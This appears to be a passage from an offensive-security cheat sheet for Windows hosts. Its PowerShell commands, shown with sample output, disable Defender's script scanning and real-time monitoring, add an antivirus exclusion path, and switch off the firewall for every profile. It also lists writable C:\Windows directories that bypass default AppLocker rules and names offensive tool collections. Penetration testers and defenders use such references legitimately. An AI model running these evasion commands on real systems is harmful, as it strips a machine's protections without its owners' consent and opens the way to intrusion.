EnableFileHashComputation                     : False
EnableLowCpuPriority                          : False
ScanOnlyIfIdleEnabled                         : True
SignatureDisableUpdateOnStartupWithoutEngine  : False


# disable AMSI (can get access denied)
PS C:\> Set-MpPreference -DisableScriptScanning $true
PS C:\> Get-MpPreference | findstr /i "scanning"
DisableArchiveScanning                        : False
DisableEmailScanning                          : True
DisableRemovableDriveScanning                 : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles                   : False
DisableScriptScanning                         : True


# disable realtime monitoring (can get access denied)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true # change to $false to re-enable
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : False
IoavProtectionEnabled           : False
NISEnabled                      : False
OnAccessProtectionEnabled       : False
RealTimeProtectionEnabled       : False


# add excluded path
PS C:\> Add-MpPreference -ExclusionPath "C:\Users\joe"

firewall

# check if firewall is enabled
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
Private Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
Public Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound


# disable it (might get access denied)
PS C:\> netsh advfirewall set allprofiles state off
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
Private Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
Public Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

applocker

# see applocker rules
PS C:\> Get-AppLockerPolicy -Effective
PS C:\> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections

since everything under C:\Windows\ is allowed by default, with basic settings it can be bypassed trivially by using common writable directories:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

tools

Windows SysInternals

OffensiveCSharp

LOLBAS

wesng